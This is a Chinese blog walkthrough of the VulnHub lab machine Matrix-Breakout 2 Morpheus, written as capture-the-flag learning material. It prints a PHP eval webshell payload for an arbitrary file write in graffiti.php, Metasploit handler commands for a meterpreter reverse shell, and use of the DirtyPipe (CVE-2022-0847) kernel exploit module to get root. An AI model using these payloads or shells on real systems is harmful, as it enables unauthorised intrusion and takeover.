Vulnhub - Morpheus

最新推荐文章于 2024-10-02 12:31:42 发布
最新推荐文章于 2024-10-02 12:31:42 发布
阅读量550 收藏 7
点赞数 6
分类专栏: Vulnhub靶机 文章标签: Vulnhub Morpheus DirtyPipe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/136668786
版权
本文讲述了作者在Morpheus靶机上进行信息收集,发现Web漏洞并实现任意文件写入,进一步利用DirtyPipe漏洞(CVE-2022-0847)进行内核提权的过程。使用Metasploit框架进行攻击并成功获取root权限。
摘要由CSDN通过智能技术生成

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

Morpheus 靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、81端口,分别运行OpenSSH 8.4p1、Apache httpd 2.4.51、Nginx 1.18.0服务。

访问80端口页面是一个Notice。Wappalyzer显示编程语言为PHP,操作系统为Debian。

访问81端口提示需要认证,如下:

 dirbuster扫描80端口网站目录,访问发现/graffiti.php,是一个类似评论的页面。

dirbuster -u "http://192.168.196.135/" -e php -r /root/DirBuster-Report-192.168.196.135.txt -l /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

 

0x02 Web漏洞利用 - 任意文件写入

随意评论111,BurpSuite抓包得到:message=111&file=graffiti.txt

这里存在任意文件写入漏洞,修改payload:message=<?php eval($_POST["pass"]);?>&file=shell.php

message=<?php eval($_POST["pass"]);?>&file=shell.php

哥斯拉连接成功,拿到Web权限www-data

0x03 内核提权 - Dirty Pipe(CVE-2022-0847)

利用哥斯拉PMeterpreter模块将Shell反弹到MSF以便后续操作

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run

上传内核漏洞辅助探测脚本linux-exploit-suggester.sh至目标主机/tmp目录下,给予执行权限执行。

辅助项目下载地址:https://github.com/The-Z-Labs/linux-exploit-suggester

得知系统为Debian 11,内核版本为5.10.0,检测到[CVE-2022-0847] DirtyPipe,并给出了EXP下载地址,但MSF收集有这个漏洞,直接搜索即可。

 

 MSF搜索CVE-2022-0847,使用payload:exploit/linux/local/cve_2022_0847_dirtypipe

设置session并run,成功拿下root权限,随后得到/root目录下的flag。

Ch4ser
关注
专栏目录
vulnhub靶场1:matrix-breakout-2-morpheus
Genarior的专栏
02-22 713
vulnhub - matrix-breakout-2-morpheus靶场记录
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 998
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
Vulnhub靶场之matrix-breakout-2-morpheus
qq_69775412的博客
10-17 712
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
2024年网安最全【网络安全】Vulnhub靶场之matrix-breakout-2-morpheus
2401_84265972的博客
05-01 776
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
vulnhub-matrix-breakout-2-morpheus靶机的测试报告
ccc_9wy的博客
10-02 1454
《黑客帝国2》为背景的靶机;基于渗透测试流程渗透matrix-breakout-2-morpheus靶机;webshell连接;反弹shell;dirtypipe漏洞;linux内核漏洞;上传exp提权;
Vulnhub】之matrix-breakout-2-morpheus
zg_111的博客
03-29 1896
上传成功后,我们通过蚁剑连接成功,并且在根目录下找到了FLAG.txt文件,并在文件中发现了flag,提示要找到 cypher 的密码,还提示 80 端口有一个隐藏图片 /.cypher-neo.png。使用burpsuite工具抓包可知,message参数为上传的内容,file参数为内容传入的文件,改变file变量可以直接对靶机文件修改,能随意创建文件。根据扫描的结果发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131。让我们先来信息收集一波吧!
【网络安全】Vulnhub靶场之matrix-breakout-2-morpheus
fly_enum的博客
12-08 1091
vulnhub是一个提供环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
随心所欲不逾矩
02-08 1061
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。
vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1438
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
vulnhub-morpheus怎么登录
10-14
Vulnhub-Morpheus是一个Linux渗透环境,通常用于网络安全学习和实践。登录Morpheus需要几个步骤: 1. **获取IP地址**:首先你需要访问Vulnhub网站 (https://vulnhub.com/),搜索"Morpheus"找到该渗透实例的详情页,...
ansible-role-morpheus
05-22
Morpheus云管理平台 外部资料库 单师傅 必需变量 用法 Percona XtraDB数据库集群 必需变量 用法 外部Elasticsearch 必需变量 用法 外部RabbitMQ 必需变量 用法 执照 作者信息 描述 该角色将Morpheus部署到基于EL...
linux-Morpheus自动EttercapTCPIP劫持工具
08-13
在r00t-3xp10it-morpheus-93b37e4这个压缩包中,可能包含了Morpheus的源代码、编译脚本、使用手册或其他相关资源。用户在使用前需要先安装必要的依赖,如Ettercap、libpcap等,然后编译和配置Morpheus,最后运行工具...
matrix-breakout-2-morpheus靶机渗透笔记
qq_60600840的博客
08-09 500
matrix-breakout-2-morpheus靶机、安全、渗透、靶机
美修大数据:2022母婴洗护品类洞察报告(2).pdf
11-03
美修大数据:2022母婴洗护品类洞察报告(2).pdf
VB程序实例-图片剪切.zip
11-03
VB程序实例-图片剪切.zip
PyMySQL-0.7.9-py3-none-any.whl
最新发布
11-03
PyMySQL-0.7.9-py3-none-any.whl
VB程序实例-运行记事本.zip
11-03
VB程序实例-运行记事本.zip
VB程序实例-显示多列菜单.zip
11-03
VB程序实例-显示多列菜单.zip
springboot083-基于web的景区管理系统.zip
11-03
项目资源包含:可运行源码+sql文件 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 项目具有较高的学习借鉴价值,也可拿来修改、二次开发。 有任何使用上的问题,欢迎随时与博主沟通,博主看到后会第一时间及时解答。 开发语言:Java 框架:springboot 技术:Vue JDK版本:JDK1.8 服务器:tomcat7 数据库:mysql 5.7(一定要5.7版本) 数据库工具:Navicat11 开发软件:eclipse/myeclipse/idea Maven包:Maven3.3.9 系统是一个很好的项目,结合了后端服务(SpringBoot)和前端用户界面(Vue.js)技术,实现了前后端分离。 后台路径地址:localhost:8080/项目名称/admin/dist/index.html 前台路径地址:localhost:8080/项目名称/front/index.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值